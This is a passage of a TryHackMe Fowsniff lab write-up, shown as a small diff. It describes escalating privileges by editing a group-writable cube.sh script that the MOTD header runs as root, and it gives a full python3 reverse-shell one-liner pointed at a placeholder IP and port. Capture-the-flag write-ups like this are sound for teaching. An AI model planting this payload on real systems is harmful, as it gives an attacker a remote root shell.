Slowdeb/Tryhackme/Fowsniff.md

 ![image](https://user-images.githubusercontent.com/76821053/166566918-dfa97f58-bc9f-43d9-81de-23cb4398adbc.png)

-After reading the contents of cube.sh we can recognize that this prints the motd (message of the day) that we receive after loggin in through ssh.
+After reading the contents of cube.sh we can recognize that this prints the motd (message of the day) that we receive after connecting through ssh.

 If we check the directory /etc/update-motd.d/ and look into the executables, the file “00-header” runs the cube.sh script with root permissions.

 ![image](https://user-images.githubusercontent.com/76821053/166566946-76373e54-79b5-48c1-bd7b-3e12788de657.png)

+This is our way to get a privilege escalation in this machine.
 Since we have group permissions to write cube.sh script we can try and get a reverse shell by including a python3 reverse shell payload.

+We need to edit the cube.sh file with "nano" or "vim" and add the python reverse shell.

 ```
 python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'